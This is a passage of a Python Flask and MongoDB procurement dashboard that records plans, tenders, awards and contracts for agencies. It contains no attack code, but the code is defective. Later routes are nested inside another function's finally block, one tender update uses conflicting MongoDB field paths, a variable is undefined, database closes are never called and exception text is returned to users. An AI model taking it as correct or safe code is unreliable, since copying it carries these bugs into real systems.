render_template('dashboard/planning.html', error='Enter the correct values in the mandatory fields')\n else:\n return render_template('dashboard/planning.html',\n error='OCID/Project is invalid or does not exist. Create New Release or Open Contracting Process')\n\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/planning.html,error = 'A Plan already exists with that OCID or OCID is invalid')\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n\n################################### START OF PLAN MODAL\n\n# retrieve plan method\n@app.route('/getPlans', methods=['POST'])\ndef getPlans():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n d = release['planning']['date']\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'planning_Description': release['planning']['identity']['description'],\n\n 'planning_Package_Number': release['planning']['identity']['package'],\n 'planning_Procurement_category': release['planning']['basicdata']['procurementcategory'],\n 'planning_Contract_type': release['planning']['basicdata']['contracttype'],\n\n 'plan_date': dString}\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n################################### END OF PLAN MODAL\n\n\n################################### TENDER\n\n\n# render tender form\n@app.route('/showNewTender')\ndef showNewTender():\n return render_template('dashboard/tender.html')\n\n\n# render tender view\n@app.route('/showSavedTender')\ndef showSavedTender():\n if session.get('user'):\n return render_template('dashboard/mytenders.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n\n# add Tender\n@app.route(\"/initiate\", methods=['POST'])\ndef createNewTender():\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n title = request.form.get('title', '')\n projdesc = request.form.get('projdesc', '')\n status = request.form.get('status', '')\n advertdate = request.form.get('advertdate', '')\n media = request.form.get('media', '')\n minvalue = int(request.form.get('minvalue', ''))\n procmethod = request.form.get('procmethod', '')\n rationale = request.form.get('rationale', '')\n bppletterofnoobj = request.form.get('bppletterofnoobj', '')\n awardCriteria = request.form.get('awardCriteria', '')\n awardCriteriadet = request.form.get('awardCriteriadet', '')\n tenderstart = request.form.get('tenderstart', '')\n tenderend = request.form.get('tenderend', '')\n submethod = request.form.get('submethod', '')\n submethoddet = request.form.get('submethoddet', '')\n hasenq = 
request.form.get('hasenq', '')\n enqperdstart = request.form.get('enqperdstart', '')\n enqperdstartend = request.form.get('enqperdstartend', '')\n haspet = request.form.get('haspet', '')\n petitionremark = request.form.get('petitionremark', '')\n eligcrit = request.form.get('eligcrit', '')\n nooftenderers = int(request.form.get('nooftenderers', ''))\n awardstart = request.form.get('awardstart', '')\n awardend = request.form.get('awardend', '')\n\n projtype = request.form.get('projtype', '')\n\n advertstart = request.form.get('advertstart', '')\n advertend = request.form.get('advertend', '')\n leadbefliststart = request.form.get('leadbefliststart', '')\n leadbeflistend = request.form.get('leadbeflistend', '')\n mdalistapprovestart = request.form.get('mdalistapprovestart', '')\n mdalistapproveend = request.form.get('mdalistapproveend', '')\n shortlistsubmission = request.form.get('shortlistsubmission', '')\n propinvitestart = request.form.get('propinvitestart', '')\n propinviteend = request.form.get('propinviteend', '')\n techpropopen = request.form.get('techpropopen', '')\n subtechEvreportstart = request.form.get('subtechEvreportstart', '')\n subtechEvreportend = request.form.get('subtechEvreportend', '')\n mdaapptechEvreportstart = request.form.get('mdaapptechEvreportstart', '')\n mdaapptechEvreportend = request.form.get('mdaapptechEvreportend', '')\n Openingfinancialpropstart = request.form.get('Openingfinancialpropstart', '')\n submissionevareportstart = request.form.get('submissionevareportstart', '')\n submissionevareportend = request.form.get('submissionevareportend', '')\n Negotiationsstart = request.form.get('Negotiationsstart', '')\n Negotiationsend = request.form.get('Negotiationsend', '')\n Negotiationappobjectstart = request.form.get('Negotiationappobjectstart', '')\n Negotiationappobjectstartend = request.form.get('Negotiationappobjectstartend', '')\n planndcertnoobjstart = request.form.get('planndcertnoobjstart', '')\n planndcertnoobjend = request.form.get('planndcertnoobjend', '')\n preqadvertstart = request.form.get('preqadvertstart', '')\n preqadvertend = request.form.get('preqadvertend', '')\n Prequalificationopen = request.form.get('Prequalificationopen', '')\n Prequalificationstart = request.form.get('Prequalificationstart', '')\n Prequalificationend = request.form.get('Prequalificationend', '')\n Prequalificationappobjectstart = request.form.get('Prequalificationappobjectstart', '')\n Prequalificationappobjectend = request.form.get('Prequalificationappobjectend', '')\n Prequalificationpubl = request.form.get('Prequalificationpubl', '')\n firstbidstart = request.form.get('firstbidstart', '')\n firstbidend = request.form.get('firstbidend', '')\n secondbidstart = request.form.get('secondbidstart', '')\n secondbidend = request.form.get('secondbidend', '')\n bidinvite = request.form.get('bidinvite', '')\n bidclose = request.form.get('bidclose', '')\n bidevalrepstart = request.form.get('bidevalrepstart', '')\n bidevalrepend = request.form.get('bidevalrepend', '')\n bidevalMDAstart = request.form.get('bidevalMDAstart', '')\n bidevalMDAend = request.form.get('bidevalMDAend', '')\n certnoobjectstart = request.form.get('certnoobjectstart', '')\n certnoobjectend = request.form.get('certnoobjectend', '')\n fecapprovestart = request.form.get('fecapprovestart', '')\n fecapproveend = request.form.get('fecapproveend', '')\n controfferstart = request.form.get('controfferstart', '')\n controfferend = request.form.get('controfferend', '')\n contrsignstart = 
request.form.get('contrsignstart', '')\n contrsignend = request.form.get('contrsignend', '')\n Mobilizationstart = request.form.get('Mobilizationstart', '')\n Mobilizationend = request.form.get('Mobilizationend', '')\n draftreptstart = request.form.get('draftreptstart', '')\n finalreptstart = request.form.get('finalreptstart', '')\n arrivalgoodsstart = request.form.get('arrivalgoodsstart', '')\n arrivalgoodsend = request.form.get('arrivalgoodsend', '')\n substcomplend = request.form.get('substcomplend', '')\n finalacceptstart = request.form.get('finalacceptstart', '')\n finalacceptend = request.form.get('finalacceptend', '')\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # check ocid not null!\n\n if title and projdesc and projtype and nooftenderers and status and advertdate and minvalue:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\n\n \"tender.title\": title,\n \"tender.procuringEntity.additionalIdentifiers.0.legalName\": session.get(\n 'agencyName'),\n \"tender.procuringEntity.additionalIdentifiers.0.id\": '',\n \"tender.procuringEntity.additionalIdentifiers.0.scheme\": '',\n \"tender.procuringEntity.additionalIdentifiers.contactPoint\": '',\n \"tender.procuringEntity.identifier.scheme\": '',\n \"tender.procuringEntity.identifier.id\": '',\n \"tender.procuringEntity.identifier.legalName\": session.get(\n 'agencyName'),\n \"tender.procuringEntity.identifier.address.countryName\": 'Nigeria',\n\n \"tender.description\": projdesc,\n \"tender.status\": status,\n \"tender.advertisementdate\": parse_datetime(advertdate),\n \"tender.advertmedia\": media,\n \"tender.unit.value.currency\": 'NGN',\n \"tender.unit.value.amount\": minvalue,\n \"tender.unit.value.quantity\": 1,\n \"tender.deliveryAddress\": '',\n \"tender.value.currency\": \"NGN\",\n \"tender.value.currency.amount\": minvalue,\n \"tender.procurementMethod\": procmethod,\n \"tender.rationale\": rationale,\n \"tender.bppletterofobjection\": bppletterofnoobj,\n \"tender.awardcriteria\": awardCriteria,\n \"tender.awardcriteriadetails\": awardCriteriadet,\n \"tender.tenderPeriodstart\": parse_datetime(tenderstart),\n \"tender.tenderPeriodend\": parse_datetime(tenderend),\n \"tender.submissionmethod\": submethod,\n \"tender.submissionmethoddetails\": submethoddet,\n \"tender.hasenquiries\": hasenq,\n \"tender.enquiryPeriod.startDate\": parse_datetime(\n enqperdstart),\n \"tender.enquiryPeriod.endDate\": parse_datetime(\n enqperdstartend),\n \"tender.haspetition\": haspet,\n \"tender.petitionremark\": petitionremark,\n \"tender.eligibilitycriteria\": eligcrit,\n \"tender.numberoftenderers\": nooftenderers,\n \"tender.awardPeriod.startDate\": parse_datetime(\n awardstart),\n \"tender.awardPeriod.endDate\": parse_datetime(awardend),\n\n \"tender.projtype\": projtype,\n\n \"tender.actualadvert\": parse_datetime(advertstart),\n \"tender.actualadvertend\": parse_datetime(advertend),\n \"tender.actualevaluation\": parse_datetime(\n leadbefliststart),\n \"tender.actualevaluationend\": parse_datetime(\n leadbeflistend),\n \"tender.actualshortlistapprove\": parse_datetime(\n mdalistapprovestart),\n \"tender.actualshortlistapproveend\": parse_datetime(\n mdalistapproveend),\n \"tender.actualshortlistpublish\": parse_datetime(\n shortlistsubmission),\n \"tender.actualproposalinvite\": parse_datetime(\n propinvitestart),\n \"tender.actualproposalinviteend\": parse_datetime(\n propinviteend),\n \"tender.actualopeningoftechprop\": parse_datetime(\n techpropopen),\n 
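# CAUTION: \"tender.value.currency\" is set to \"NGN\" above and\n                                                            # \"tender.value.currency.amount\" is assigned as well; MongoDB rejects\n                                                            # updates whose dotted paths conflict (one is a prefix of the other),\n                                                            # so this update_one likely fails -- \"tender.value.amount\" was\n                                                            # probably intended.\n                                                            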
\"tender.actualevaluationtech\": parse_datetime(\n subtechEvreportstart),\n \"tender.actualevaluationtechend\": parse_datetime(\n subtechEvreportend),\n \"tender.actualevaluationtechapprov\": parse_datetime(\n mdaapptechEvreportstart),\n \"tender.actualevaluationtechapprovend\": parse_datetime(\n mdaapptechEvreportend),\n \"tender.actualopenfinancialprop\": parse_datetime(\n Openingfinancialpropstart),\n \"tender.actualsubmittechreport\": parse_datetime(\n submissionevareportstart),\n \"tender.actualsubmittechreportend\": parse_datetime(\n submissionevareportend),\n \"tender.actualnegotiations\": parse_datetime(\n Negotiationsstart),\n \"tender.actualnegotiationsend\": parse_datetime(\n Negotiationsend),\n \"tender.actualprocuringenteval\": parse_datetime(\n Negotiationappobjectstart),\n \"tender.actualprocuringentevalend\": parse_datetime(\n Negotiationappobjectstartend),\n \"tender.actualcertificateobj\": parse_datetime(\n planndcertnoobjstart),\n \"tender.actualcertificateobjend\": parse_datetime(\n planndcertnoobjend),\n \"tender.actualadvertprequal\": parse_datetime(\n preqadvertstart),\n \"tender.actualadvertprequalend\": parse_datetime(\n preqadvertend),\n \"tender.actualprequalopening\": parse_datetime(\n Prequalificationopen),\n \"tender.actualevalpreqalsubm\": parse_datetime(\n Prequalificationstart),\n \"tender.actualevalpreqalsubmend\": parse_datetime(\n Prequalificationend),\n \"tender.actualprequalapprov\": parse_datetime(\n Prequalificationappobjectstart),\n \"tender.actualprequalapprovend\": parse_datetime(\n Prequalificationappobjectend),\n \"tender.actualprequalpublish\": parse_datetime(\n Prequalificationpubl),\n \"tender.actualfirstbid\": parse_datetime(firstbidstart),\n \"tender.actualfirstbidend\": parse_datetime(firstbidend),\n \"tender.actualsecondbid\": parse_datetime(secondbidstart),\n \"tender.actualsecondbidend\": parse_datetime(\n secondbidend),\n \"tender.actualbidinvite\": parse_datetime(bidinvite),\n \"tender.actualbidclose\": parse_datetime(bidclose),\n \"tender.actualbidevaluation\": parse_datetime(\n bidevalrepstart),\n \"tender.actualbidevaluationend\": parse_datetime(\n bidevalrepend),\n \"tender.actualprocuringenteval\": parse_datetime(\n bidevalMDAstart),\n \"tender.actualprocuringentevalend\": parse_datetime(\n bidevalMDAend),\n \"tender.actualcertificateobjevalreport\": parse_datetime(\n certnoobjectstart),\n \"tender.actualcertificateobjevalreportend\": parse_datetime(\n certnoobjectend),\n \"tender.actualfecapproval\": parse_datetime(\n fecapprovestart),\n \"tender.actualfecapprovalend\": parse_datetime(\n fecapproveend),\n \"tender.actualcontractoffer\": parse_datetime(\n controfferstart),\n \"tender.actualcontractofferend\": parse_datetime(\n controfferend),\n \"tender.actualcontractsignature\": parse_datetime(\n contrsignstart),\n \"tender.actualcontractsignatureend\": parse_datetime(\n contrsignend),\n \"tender.actualmobilization\": parse_datetime(\n Mobilizationstart),\n \"tender.actualmobilizationend\": parse_datetime(\n Mobilizationend),\n \"tender.actualsubmissiondraftrep\": parse_datetime(\n draftreptstart),\n \"tender.actualsubmissionfinalrep\": parse_datetime(\n finalreptstart),\n \"tender.actualgoodsarrival\": parse_datetime(\n arrivalgoodsstart),\n \"tender.actualgoodsarrivalend\": parse_datetime(\n arrivalgoodsend),\n \"tender.actualsubstantialcomplete\": parse_datetime(\n substcomplend),\n \"tender.actualfinalaccept\": parse_datetime(\n finalacceptstart),\n \"tender.actualfinalacceptend\": parse_datetime(\n finalacceptend)\n\n }\n 
})\n\n if query.modified_count == 1:\n\n message = \"\"\"Your Tender with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/tender.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/tender.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/tender.html',\n error='Enter the required values in the right format in the required fields')\n\n\n else:\n return render_template('dashboard/tender.html',\n error='OCID/Project is invalid or does not exist. Create New Release or Open Contracting Process')\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/tender.html,error = 'A Tender already exists with that OCID or OCID is invalid')\n\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n\n################################### START OF TENDER MODAL\n\n# retrieve tender method\n@app.route('/getTenders', methods=['POST'])\ndef getTenders():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n\n\n # looping through each query output\n for release in releases:\n d = release['tender']['advertisementdate']\n # collecting year, month and day from ISO date format\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'tender_Description': release['tender']['description'],\n 'Number_of_tenderers': release['tender']['numberoftenderers'],\n 'tender_status': release['tender']['status'],\n 'advert_date': dString,\n 'estimated_cost': release['tender']['value']['amount']}\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n# get particular tender information\n@app.route('/getTenderById', methods=['POST'])\ndef getTenderById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n response = []\n releases_dict = []\n\n # find_one returns a single document (or None), so no cursor iteration is needed\n if releases:\n release_dict = {\n 'tender_status': releases['tender']['status']\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n# update 
tender\n@app.route('/updateTender', methods=['POST'])\ndef updateTender():\n try:\n if session.get('user'):\n _status = request.form['status']\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"tender.status\": _status\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n # get particular contractor information\n @app.route('/getContractorById', methods=['POST'])\n def getContractorById():\n try:\n if session.get('user'):\n\n _id = int(request.form['id'])\n\n print(_id)\n # pymongo projection - fields\n contractors = db.registeredcontractors.find_one({\"BPP_Contractor_ID\": _id})\n\n # for rel in releases['releases']:\n # print(rel['tag'][0])\n\n\n response = []\n releases_dict = []\n\n # print(contractors['BPP_Contractor_ID'])\n\n release_dict = {\n 'BPP_ID': contractors['BPP_Contractor_ID'],\n 'Company_Name': contractors['Full_Registered_Company_Name'],\n 'CAC_Number': contractors['CACRegistrationNumber']\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # add tenderer to tender record\n\n # update tender\n @app.route('/newTenderer', methods=['POST'])\n def newTenderer():\n try:\n if session.get('user'):\n bppid = int(request.form['BPP_ID'])\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$push\":\n {\n \"tender.tenderers\": bppid\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n\n\n ################################### END OF TENDER MODAL\n\n\n\n\n\n\n ################################### AWARD\n\n # render award form\n\n @app.route('/showNewAward')\n def showNewAward():\n return render_template('dashboard/award.html')\n\n # render award view\n @app.route('/showSavedAward')\n def showSavedAward():\n\n if session.get('user'):\n return render_template('dashboard/myawards.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n # new award\n @app.route(\"/addAward\", methods=['POST'])\n def addAward():\n\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n title = request.form.get('title', '')\n awardrefno = request.form.get('awardrefno', '')\n projdesc = request.form.get('projdesc', '')\n status = request.form.get('status', '')\n bppref = request.form.get('bppref', '')\n bppnodate = request.form.get('bppnodate', '')\n procappdate = request.form.get('procappdate', '')\n awarddate = request.form.get('awarddate', '')\n value = int(request.form['value'])\n\n Awardee = request.form.get('Awardee', '')\n\n bppno = int(request.form['bppno'])\n\n print(bppno)\n contdetails = request.form.get('contdetails', '')\n contractstart = 
request.form.get('contractstart', '')\n contractend = request.form.get('contractend', '')\n lowestbid = request.form.get('lowestbid', '')\n justify = request.form.get('justify', '')\n\n _agencyName = session.get('agencyName')\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # check ocid not null!\n\n if bppref and Awardee and bppno and value and lowestbid:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\n\n \"awards\": [{\n \"status\": status,\n \"description\": projdesc,\n \"title\": title,\n \"reference\": awardrefno,\n \"date\": parse_datetime(awarddate),\n \"id\": ocid,\n \"items\": [{\"unit\":\n {\"name\": \"Items\",\n \"value\": {\"currency\": \"NGN\",\n \"amount\": value}},\n \"id\": ocid,\n \"classification\": {\"scheme\": \"\",\n \"id\": \"\"},\n \"quantity\": 1}],\n\n \"suppliers\": [{\"additionalIdentifiers\": [\n {\"legalName\": Awardee}],\n \"identifier\": {\"scheme\": \"\",\n \"id\": \"\",\n \"legalName\": Awardee},\n \"name\": Awardee, \"bppNo\": bppno}],\n \"id\": ocid,\n \"value\": {\"currency\": \"NGN\", \"amount\": value},\n \"bppcertificateofobjectionnumber\": bppref,\n \"bppcertificateofobjectiondate\": parse_datetime(\n bppnodate),\n \"procuringentityapprovaldate\": parse_datetime(\n procappdate),\n \"contractdetails\": contdetails,\n \"contractPeriod.startDate\": parse_datetime(\n contractstart),\n \"contractPeriod.endDate\": parse_datetime(\n contractend),\n \"lowestbidder\": lowestbid,\n \"justification\": justify\n }]\n\n }\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Award with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/award.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/award.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/award.html',\n error='Enter the required values in the right format in the required fields')\n\n\n else:\n return render_template('dashboard/award.html',\n error='OCID/Project is invalid or does not exist. 
Create New Release or Open Contracting Process')\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/tender.html,error = 'A Tender already exists with that OCID or OCID is invalid')\n\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n ################################### START OF AWARD MODAL\n\n\n # retrieve awards method\n @app.route('/getAwards', methods=['POST'])\n def getAwards():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n # 'awards' is stored as a list (see addAward), so read the first entry\n d = release['awards'][0]['date']\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'award_Description': release['awards'][0]['description'],\n 'reference': release['awards'][0]['reference'],\n 'award_status': release['awards'][0]['status'],\n 'award_date': dString,\n 'value': release['awards'][0]['value']['amount']}\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # get particular award information\n @app.route('/getAwardById', methods=['POST'])\n def getAwardById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n response = []\n releases_dict = []\n\n # find_one returns a single document (or None), so no cursor iteration is needed\n if releases:\n release_dict = {\n 'award_status': releases['awards'][0]['status']\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # update award\n @app.route('/updateAward', methods=['POST'])\n def updateAward():\n try:\n if session.get('user'):\n _status = request.form['status']\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n # awards is an array; update the status of the first award\n \"awards.0.status\": _status\n\n }\n\n })\n\n if query.modified_count == 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n\n\n\n\n\n\n\n ################################### END OF AWARD MODAL\n\n ################################### CONTRACT\n # render contract form\n @app.route('/showNewContract')\n def showNewContract():\n return render_template('dashboard/contract.html')\n\n # render contract view\n 
@app.route('/showSavedContract')\n def showSavedConract():\n\n if session.get('user'):\n return render_template('dashboard/mycontracts.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n # new contract\n @app.route(\"/addContract\", methods=['POST'])\n def addContract():\n\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n contref = request.form.get('contref', '')\n title = request.form.get('title', '')\n projdesc = request.form.get('projdesc', '')\n status = request.form.get('status', '')\n signeddate = request.form.get('signeddate', '')\n contractstart = request.form.get('contractstart', '')\n contractend = request.form.get('contractend', '')\n\n street = request.form.get('street', '')\n city = request.form.get('city', '')\n state = request.form.get('state', '')\n Country = request.form.get('Country', '')\n\n stringAddress = [street, city, state, Country]\n\n g = geocoder.google(\",\".join(stringAddress))\n latitude = g.lat\n longitude = g.lng\n\n _agencyName = session.get('agencyName')\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # check ocid not null!\n\n if contref and street and city and Country:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\n\n \"contracts\": [{\n \"status\": status,\n \"documents\": [\n {\"id\": ocid, \"language\": language}],\n \"description\": projdesc,\n \"title\": title,\n \"reference\": contref,\n \"implementation\":\n {\"milestones\": [{\"status\": \"\",\n \"documents\": [{\"id\": \"\",\n \"language\": language}],\n \"dateModified\": \"\",\n \"id\": ocid,\n \"dueDate\": \"\"}]},\n \"providerOrganization\":\n {\"scheme\": \"\", \"id\": \"\",\n \"legalName\": _agencyName},\n \"items\": [{\"unit\": {\"name\": \"\",\n \"value\": {\"currency\": \"NGN\",\n \"amount\": 0}},\n \"id\": ocid,\n \"classification\": {\"scheme\": \"\",\n \"id\": \"\"},\n \"quantity\": 1}],\n \"awardID\": ocid,\n \"id\": ocid,\n \"signeddate\": parse_datetime(signeddate),\n \"period\": {\n \"startDate\": parse_datetime(contractstart),\n \"endDate\": parse_datetime(contractend)},\n \"dueDate\": parse_datetime(contractend),\n \"projectlocation\": {\n \"streetaddress\": street,\n \"city\": city,\n \"state\": state,\n \"country\": Country\n }\n }]\n\n }\n })\n\n # update array\n #####delete from array\n # db.releases.update({\"ocid\":\"OCDS-2016-UNIBEN2016359-22-54-45\"},{\"$pull\":{\"contracts.projectlocation.coord\":6.334986}});\n\n\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$push\":\n {\n \"contracts.projectlocation.coord\": longitude\n\n }\n\n })\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$push\":\n {\n \"contracts.projectlocation.coord\": latitude\n\n }\n\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Contract with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/contract.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/contract.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/contract.html',\n error='Enter the required values in the right format in the required fields')\n\n\n else:\n return render_template('dashboard/contract.html',\n error='OCID/Project is invalid or does not exist. 
Create New Release or Open Contracting Process')\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/tender.html,error = 'A Tender already exists with that OCID or OCID is invalid')\n\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n ################################### START OF CONTRACT MODAL\n\n\n # retrieve contracts method\n @app.route('/getContracts', methods=['POST'])\n def getContracts():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n sd = release['contracts']['signeddate']\n dString = sd.strftime(\"%Y-%m-%d\")\n\n startd = release['contracts']['period']['startDate']\n startString = startd.strftime(\"%Y-%m-%d\")\n\n endd = release['contracts']['period']['endDate']\n endString = endd.strftime(\"%Y-%m-%d\")\n\n # THE ARRAY IS A LIST\n coord = release['contracts']['projectlocation']['coord']\n\n # for rev in inrel['contracts']['projectlocation']['coord']:\n # print rev\n release_dict = {\n 'OCID': release['ocid'],\n 'contract_Description': release['contracts']['description'],\n 'reference': release['contracts']['reference'],\n 'contract_status': release['contracts']['status'],\n 'contract_date': dString,\n 'start_date': startString,\n 'end_date': endString,\n 'street': release['contracts']['projectlocation']['streetaddress'],\n 'city': release['contracts']['projectlocation']['city'],\n 'state': release['contracts']['projectlocation']['state'],\n 'country': release['contracts']['projectlocation']['country'],\n 'longit': coord[0],\n 'latitude': coord[1]\n }\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # get particular contract information\n @app.route('/getContractById', methods=['POST'])\n def getContractById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n response = []\n releases_dict = []\n\n release_dict = {\n 'award_status': releases['contracts']['status']\n\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n # print(json.dumps(response\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n #############################################End of DATA FETCHING METHODS\n\n\n\n # update contract\n @app.route('/updateContract', 